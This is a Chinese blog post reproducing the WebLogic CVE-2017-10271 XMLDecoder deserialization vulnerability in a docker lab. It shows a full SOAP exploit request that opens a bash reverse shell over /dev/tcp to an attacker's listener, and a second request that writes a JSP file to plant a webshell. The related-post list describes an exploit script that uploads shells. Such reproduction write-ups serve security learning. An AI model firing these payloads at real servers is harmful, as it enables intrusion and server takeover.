Weblogic(CVE-2017-10271)的漏洞复现

最新推荐文章于 2024-08-01 08:04:57 发布
最新推荐文章于 2024-08-01 08:04:57 发布
阅读量666 收藏 1
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42253265/article/details/112767599
版权

Weblogic(CVE-2017-10271)的漏洞复现
漏洞形成原因
• Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
漏洞如何利用
利用服务器的XMLDecoder可以解析XML数据这一特性,可以构造XML语句,上传一句话木马,getshell。
漏洞涉及版本
10.3.6.0
12.1.3.0.0
12.2.1.1.0
漏洞复现过程
• Kali docker 容器中启动此漏洞环境
在这里插入图片描述
浏览器访问 Kali 的 ip 地址并接上7001端口
在这里插入图片描述
访问 wls-wsat/CoordinatorPortType11
在这里插入图片描述
kali 攻击机监听 21 端口
nc -lvp 21
在这里插入图片描述
对 wls-wsat/CoordinatorPortType11 页面进行抓包,并修改包里面内容,使用的poc如下:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: **目的ip**:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/**攻击机ip**/21 0&gt;&amp;1</string> 
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

再看 kali返回结果,反弹shell成功
在这里插入图片描述
漏洞利用,exp如下:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 586

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">>
<object class="java.io.PrintWriter"> 
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println"><string>
<![CDATA[
<% out.print("hello,world!"); %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java> 
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

访问 ip:7001/bea_wls_internal/test.jsp ,打印成功,可再将helloworld里面内容构造成一句话,再用webshell连接工具连接!
在这里插入图片描述

冰羽呐
关注
专栏目录
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271复现)
薛定谔嘚喵博客
05-07 738
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。漏洞触发url漏洞本质:主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。
记录一次vulhub:Weblogic反序列化漏洞复现(CVE-2017-10271)
sszsNo1的博客
06-26 171
复现vulhub:Weblogic反序列化漏洞复现(CVE-2017-10271)
Weblogic CVE-2017-10271漏洞复现
君莫hacker的博客
09-09 1501
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
WebLogic:CVE-2017-10271[XML反序列化]
最新发布
h1008685的博客
08-01 714
WebLogic:CVE-2017-10271[XML反序列化],漏洞成因,环境部署,漏洞利用:1.漏洞发生页 2.配置poc请求包,3.kali监听端口,4.bp发送poc请求包,5.连接建立成功
weblogic----CVE-2017-10271漏洞复现
qq_43571759的博客
04-07 1251
CVE-2017-10271漏洞复现 漏洞描述: Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 序列化: 明明序列化那么多漏洞为什么还要序列化?因为便于传输,第一次接触到序列化是PHP的序列化,当时个人理解就是把一个对象转换成字符串进行传输,需要使用的时...
CVE-2017-10271漏洞复现
qq_36594628的博客
07-27 5425
CVE-2017-10271复现 一、启动环境 ​ 靶机:ubantu20.04 IP:192.168.3.115 ​ 攻击机:win10 IP:192.168.1.238 ​ 在ubantu 20.04 搭建 Vulhub 环境中已经介绍了怎么启动环境。 二、漏洞信息 ​ WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 (一)、漏洞描述 ​ 在了解CVE-2017
CVE-2017-10271复现
weixin_30619101的博客
05-27 129
编号:CVE-2017-10271 作者:Id3al 复现时间:2019-5-26 最近在工作中偶遇到关于weblogic的几个洞,分别是CVE-2017-10271CVE-2017-2628等,于是便想着深入学习下这几个漏洞,本篇文章主要复现CVE-2017-10271漏洞,下面会从搭建环境开始一步一步复现 先介绍下环境 环境搭建 Linux: 系统:cent...
漏洞复现Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2038
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
WeblogicCVE-2017-10271
01-03
weblogic打补丁操作步骤 主义更换路径!攻击者针对WebLogicWLS组件中存在的CVE-2017-10271远程代码执行漏洞,构造请求对运行的WebLogic中间件主机进行攻击,由于该漏洞利用方式简单,且能够直接获取目标服务器的控制权限,影响范围较广,近期发现此漏洞的利用方式为传播虚拟币挖矿程序,不排除会被黑客用于其他目的的攻击。
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
Weblogic(CVE-2017-10271)漏洞复现
01-05 2068
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2....
weblogic CVE-2017-10271漏洞复现
qq_68581192的博客
05-24 1157
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
WebLogic XMLDecoder反序列化(CVE-2017-10271漏洞复现
橘子女侠
07-20 1378
Weblogic XMLDecoder 反序列化(CVE-2017-10271漏洞复现 一、漏洞概述 1、漏洞编号:CVE-2017-10271 2、漏洞描述:WebLogic的 WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,执行...
weblogic cve-2017-10271漏洞复现(vulfocus)
m0_74294234的博客
04-07 408
此处的bash -i >& /dev/tcp/ip/port 0>&1中的ip为你的vps服务器的地址,port为你开启监听的端口(我这里开启监听的端口是8888)小tips:如果你的监听一直失败:可能是你的监听没有打开,你需要在你的vps服务器上打开你的所有端口。(指令:find / -name flag*)温馨提示:要先开启监听端口在进行burpsuite反向shell发送。4:开启远程监听(我这里使用的是8888端口开启监听)并获得权限。一:工具:burpsuite、vps服务器。
cve-2017-10271漏洞复现
06-28
CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来复现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值